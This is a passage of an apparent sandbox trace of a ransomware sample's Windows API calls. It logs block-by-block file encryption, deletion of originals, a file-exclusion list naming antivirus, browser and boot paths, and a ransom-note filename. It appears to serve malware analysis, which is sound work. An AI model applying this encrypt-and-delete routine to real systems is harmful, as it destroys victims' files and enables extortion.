pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.870] GetLastError () returned 0x0 [0169.870] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.870] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.870] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.871] GetLastError () returned 0x0 [0169.871] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.871] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.871] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.871] GetLastError () returned 0x0 [0169.871] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.871] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.871] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0169.871] GetLastError () returned 0x0 [0169.871] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0169.871] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0169.872] WriteFile (in: hFile=0x15c4, lpBuffer=0x2893368*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0169.872] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui")) returned 0x20 [0169.873] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui", dwFileAttributes=0x20) returned 0 [0169.873] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui") returned 1 [0169.874] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui")) returned 0 [0169.874] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" [0169.874] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US") returned 1 [0169.874] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\.xXB43.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\.xxb43.tmp")) returned 0xb43 [0169.875] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\.xXB43.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\.xxb43.tmp"), dwFlags=0x1) returned 0 [0169.876] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\.xXB43.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\.xxb43.tmp")) returned 1 [0169.876] CryptDestroyKey (hKey=0x9ad478) returned 1 [0169.876] wcslen (_String="OK") returned 0x2 [0169.876] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.876] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.876] CryptDestroyKey (hKey=0x9ad638) returned 1 [0169.876] CryptDestroyHash (hHash=0x9ad5f8) returned 1 [0169.876] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0169.877] FindNextFileW (in: hFindFile=0x9ad8b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*NMCRYPT") returned 0 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*.exe") returned 0 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*.dll") returned 0 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*.lnk") returned 0 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*.bat") returned 0 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*.ini") returned 0 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*.msi") returned 0 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*.scf") returned 0 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*AppData*") returned 0 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*\\java\\*") returned 0 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*\\windows\\*") returned 0 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0169.877] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*Atheros*") returned 0 [0169.878] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*Realtek*") returned 0 [0169.878] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*bootmgr*") returned 0 [0169.878] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*boot*") returned 0 [0169.878] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*boot*") returned 0 [0169.878] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0169.878] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*IO.SYS*") returned 0 [0169.878] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0169.878] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0169.878] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*ntldr*") returned 0 [0169.878] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*chrome*") returned 0 [0169.878] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*opera*") returned 0 [0169.878] PathMatchSpecW (pszFile="oledb32r.dll.mui", pszSpec="*firefox*") returned 0 [0169.878] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui", pszSpec="*") returned 1 [0169.878] strlen (_Str="NMoreira") returned 0x8 [0169.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.879] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.880] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.881] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.882] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.883] CryptGenRandom (in: 